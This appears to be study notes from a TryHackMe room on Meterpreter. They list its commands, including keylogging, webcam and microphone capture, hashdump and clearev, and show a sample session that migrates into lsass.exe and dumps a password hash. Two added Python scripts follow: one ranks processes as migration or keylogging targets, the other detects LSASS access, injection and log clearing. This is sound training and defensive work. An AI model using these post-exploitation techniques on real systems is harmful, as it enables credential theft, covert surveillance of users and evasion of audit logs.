Meterpreter
https://tryhackme.com/r/room/meterpreter

Meterpreter is a Metasploit payload that supports the penetration testing process with many valuable components. Meterpreter runs on the target system and acts as an agent within a command and control architecture: the Metasploit handler on the attacker's machine is the server, the implant on the target is the client.
Meterpreter runs on the target system without being installed on it. The payload is loaded straight into memory (RAM) by reflective DLL injection and does not write itself to disk, so on the target it exists only as a running process (or a thread inside an existing process), not as a file. Meterpreter also encrypts the traffic between the target and the Metasploit handler. Running from memory removes the artifact a file-based antivirus scan would find; it does not make the implant invisible, since memory scanners and EDR products recognise the stock Meterpreter stages well, and whatever delivered the payload (a dropped executable, a malicious document, an exploited service) still leaves its own traces.
Use the following command to list the available meterpreter payloads (a slash marks a staged payload, e.g. windows/x64/meterpreter/reverse_tcp; an underscore marks a stageless one, e.g. windows/x64/meterpreter_reverse_tcp):
msfvenom --list payloads | grep meterpreter
Meterpreter Commands
Core commands:
? : Help menu
background : Backgrounds current session
exit : Terminates session
guid : Get session GUID
info : Display post module information
irb : Opens interactive ruby shell
load : Loads one or more meterpreter extensions
migrate : Migrates meterpreter process to another process
run : Executes a meterpreter script or post module
sessions : Quickly switch to another session
File and networking commands:
search : Searches for files
upload : Uploads file or directory
download : Downloads a file or directory
netstat : Displays the network connections
portfwd : Forwards a local port to a remote service
route : Allows to view and modify routing table
System commands:
clearev : Clears event logs
execute : Executes a command
getpid : Shows current process identifier
kill : Terminates process
reboot : Reboots remote computer
shell : Drops into system command shell
sysinfo : Gets information about remote system
Other commands:
idletime : Returns the number of seconds remote user is idle
keyscan_dump : Dumps the keystroke buffer
keyscan_start : Starts capturing keystrokes
keyscan_stop : Stops capturing keystrokes
screenshare : Allows you to watch the remote user's desktop
record_mic : Records audio from default microphone
webcam_chat : Starts video chat
webcam_stream : Plays a video stream from the specified webcam
getsystem : Attempts to elevate privilege
hashdump : Dumps contents of SAM database
Post Exploitation
The migrate command moves the Meterpreter agent into another process to aid in continued interaction. This can be helpful to create a more stable Meterpreter session, for example when the current host process is a short-lived exploited service that is about to exit or crash. It can also be used for keylogging: migrating into a process that owns the interactive desktop, such as winword.exe, notepad.exe, or even a browser, lets keyscan_start see that user's keystrokes. Two caveats: the session takes on the security context of the process it migrates into, so moving from a SYSTEM process into a user's process drops to that user's privileges; and migrating into a protected process (lsass.exe on hosts with RunAsPPL enabled, for instance) fails, while crashing a critical process such as csrss.exe or wininit.exe takes the whole host down.
The following is a sample command sequence involving migration:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > ps
PID PPID Name Arch Session User
--- ---- ---- ---- ------- ----
716 596 lsass.exe x64 0 NT AUTHORITY\SYSTEM
...
meterpreter > migrate 716
[*] Migrating from 1304 to 716...
[*] Migration completed successfully.
meterpreter > hashdump
Administrator:500:aad3b51404eeab3b456b51:31243f0ae90cc89c0:::
meterpreter > shell
Process 2124 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
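Choosing the migration target is the part of the sequence above that is easy to get wrong. The Python below is an added example (it is not part of the TryHackMe room and not Metasploit code): it parses the table that the ps command prints, drops protected or critical processes, matches the session's architecture and user, and ranks what is left. The sample ps output is constructed for the example, and the RISKY and PREFERRED sets are this example's assumptions, not a list Metasploit ships.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample of meterpreter `ps` output (PIDs and users are illustrative,
# not captured from a real host). Rows without Arch or User are normal in real
# output: the session could not open those processes.
SAMPLE_PS = r"""
PID   PPID  Name              Arch  Session  User                 Path
---   ----  ----              ----  -------  ----                 ----
0     0     [System Process]
4     0     System            x64   0
596   512   services.exe      x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\services.exe
716   596   lsass.exe         x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\lsass.exe
1304  596   svchost.exe       x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\svchost.exe
1520  596   spoolsv.exe       x64   0        NT AUTHORITY\SYSTEM  C:\Windows\System32\spoolsv.exe
2044  1988  explorer.exe      x64   1        WORKSTATION\alice    C:\Windows\explorer.exe
2312  2044  notepad.exe       x64   1        WORKSTATION\alice    C:\Windows\System32\notepad.exe
2480  2044  OneDrive.exe      x86   1        WORKSTATION\alice    C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"""


@dataclass
class Process:
    pid: int
    ppid: int
    name: str
    arch: str
    session: int
    user: Optional[str]
    path: Optional[str]


# One `ps` row. User may contain a single space (NT AUTHORITY\SYSTEM); the Path
# column is separated from User by at least two spaces, so that is the split point.
PS_ROW = re.compile(
    r"^\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>.+?)\s+(?P<arch>x64|x86)"
    r"\s+(?P<session>\d+)(?:\s+(?P<user>\S.*?))?(?:\s{2,}(?P<path>\S.*))?\s*$"
)

# Assumed (this example's own lists, not Metasploit's):
# lsass.exe is often a Protected Process Light, so injection fails and the attempt
# is logged; the others are critical, and a crash there blue-screens the host.
RISKY = {"lsass.exe", "csrss.exe", "smss.exe", "wininit.exe", "winlogon.exe", "services.exe"}
# Long-lived hosts in order of preference: spoolsv/svchost for a quiet SYSTEM foothold,
# explorer.exe (owns the interactive desktop) when keystrokes are the goal.
PREFERRED = ["spoolsv.exe", "svchost.exe", "explorer.exe", "notepad.exe"]


def parse_ps(text: str) -> List[Process]:
    """Turn the text of `ps` into Process records; unparseable rows are skipped."""
    procs = []
    for line in text.splitlines():
        m = PS_ROW.match(line)
        if not m:  # header, separator, or a row the session could not inspect
            continue
        procs.append(Process(int(m["pid"]), int(m["ppid"]), m["name"], m["arch"],
                             int(m["session"]), m["user"], m["path"]))
    return procs


def migration_candidates(procs: List[Process], arch: str, *, session: Optional[int] = None,
                         user: Optional[str] = None, current_pid: Optional[int] = None,
                         keylog: bool = False) -> List[Process]:
    """Processes safe to migrate into, best first.

    arch: keep to the session's own architecture unless you know your Metasploit
          version migrates across architectures.
    user: the security context you want to keep (migration adopts the target's).
    keylog: require an interactive (non-0) session with a logged-on user.
    """
    out = []
    for p in procs:
        if p.arch != arch or p.pid == current_pid or p.name.lower() in RISKY:
            continue
        if session is not None and p.session != session:
            continue
        if user is not None and (p.user or "").lower() != user.lower():
            continue
        if keylog and (p.session == 0 or p.user is None):
            continue
        out.append(p)

    def rank(p: Process):
        n = p.name.lower()
        return (PREFERRED.index(n) if n in PREFERRED else len(PREFERRED), p.pid)

    return sorted(out, key=rank)


if __name__ == "__main__":
    procs = parse_ps(SAMPLE_PS)
    for p in migration_candidates(procs, "x64", user=r"NT AUTHORITY\SYSTEM", current_pid=1304):
        print("stable SYSTEM target:", p.pid, p.name)
    for p in migration_candidates(procs, "x64", keylog=True):
        print("keylog target:", p.pid, p.name, "as", p.user)
```

With the sample above, a SYSTEM session living in svchost.exe (PID 1304) is pointed at spoolsv.exe rather than lsass.exe, and a keylogging run is pointed at alice's explorer.exe first, with the x86 OneDrive.exe only offered to an x86 session.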
Post exploitation using meterpreter can be split into the following categories:
Gathering further intelligence about the target system
Searching for files, credentials, interfaces, and further information
Privilege escalation
Lateral movement
The following command loads kiwi, Meterpreter's in-memory port of Mimikatz, a great tool for post exploitation and privilege escalation on Windows machines. It needs a high-privileged session (SYSTEM, or a user with the debug privilege) to read LSASS, and on an x64 host it must be loaded from an x64 Meterpreter, so migrate into an x64 process first if the session is x86:
meterpreter > load kiwi
Loading extension kiwi... mimikatz 2.2.0 20191125 (x64/windows)
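From the defender's side, the commands in this section are loud. As an added example (not part of the TryHackMe room and not Metasploit code), the Python below runs three detection rules over constructed Sysmon and Windows Security events: a process outside an allowlist opening lsass.exe with read, write or thread-creation rights (what hashdump, kiwi and migrating into lsass.exe produce, Sysmon event 10); a thread created in another process (how migrate lands in its target, Sysmon event 8); and a cleared audit log (Security 1102 and System 104, which clearev leaves behind). Field names follow Sysmon's and the Security log's; the event records and the allowlist entries are constructed for the example and must be tuned per environment.

```python
from typing import Dict, List

# Process access rights from winnt.h that matter for credential theft and injection.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
SENSITIVE_ACCESS = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE

# Constructed allowlist of images that legitimately touch lsass.exe or create remote
# threads on this fleet. Build it from baseline data; a vendor name is not enough,
# because an attacker can name a binary anything.
ALLOWLIST = {
    r"c:\program files\windows defender\msmpeng.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed events, normalised to the fields a SIEM exposes from Sysmon and the
# Security/System logs. Not collected from a real host.
SAMPLE_EVENTS: List[Dict] = [
    {"source": "Sysmon", "id": 10, "SourceProcessId": 1304, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"source": "Sysmon", "id": 8, "SourceProcessId": 1304, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetProcessId": 716, "TargetImage": r"C:\Windows\System32\lsass.exe"},
    {"source": "Sysmon", "id": 10, "SourceProcessId": 2900, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"source": "Sysmon", "id": 10, "SourceProcessId": 3100, "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"source": "Security", "id": 1102, "SubjectUserName": "SYSTEM", "SubjectDomainName": "NT AUTHORITY"},
    {"source": "System", "id": 104, "Channel": "Application", "SubjectUserName": "SYSTEM"},
    {"source": "Security", "id": 4624, "LogonType": 3, "TargetUserName": "alice"},
]


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict]) -> List[Dict]:
    """Apply the three rules and return one alert per matching event."""
    alerts = []
    for ev in events:
        src, eid = ev.get("source"), ev.get("id")
        if src == "Sysmon" and eid == 10:
            # Rule 1: sensitive handle to lsass.exe from a non-allowlisted image.
            # 0x1000 (PROCESS_QUERY_LIMITED_INFORMATION) alone is what Task Manager
            # and most monitoring agents ask for, so the mask test keeps them out.
            if image_name(ev["TargetImage"]) != "lsass.exe":
                continue
            if ev["SourceImage"].lower() in ALLOWLIST:
                continue
            if int(ev["GrantedAccess"], 16) & SENSITIVE_ACCESS:
                alerts.append({"rule": "lsass_access", "pid": ev["SourceProcessId"],
                               "image": ev["SourceImage"], "access": ev["GrantedAccess"]})
        elif src == "Sysmon" and eid == 8:
            # Rule 2: remote thread creation, the footprint of migrate in its target.
            if ev["SourceImage"].lower() in ALLOWLIST:
                continue
            severity = "high" if image_name(ev["TargetImage"]) == "lsass.exe" else "medium"
            alerts.append({"rule": "remote_thread", "severity": severity,
                           "pid": ev["SourceProcessId"], "target_pid": ev["TargetProcessId"]})
        elif (src, eid) in {("Security", 1102), ("System", 104)}:
            # Rule 3: an event log was cleared. Security writes 1102 about itself;
            # clearing any other log writes 104 to the System log with the Channel.
            alerts.append({"rule": "log_cleared", "log": ev.get("Channel", "Security"),
                           "by": ev.get("SubjectUserName")})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a)
```

Over the sample, the SYSTEM svchost.exe that opened and injected into lsass.exe raises two alerts, Defender's identical handle is suppressed by the allowlist, Task Manager's limited query is suppressed by the access mask, and the two cleared logs each raise one alert; the ordinary network logon is ignored.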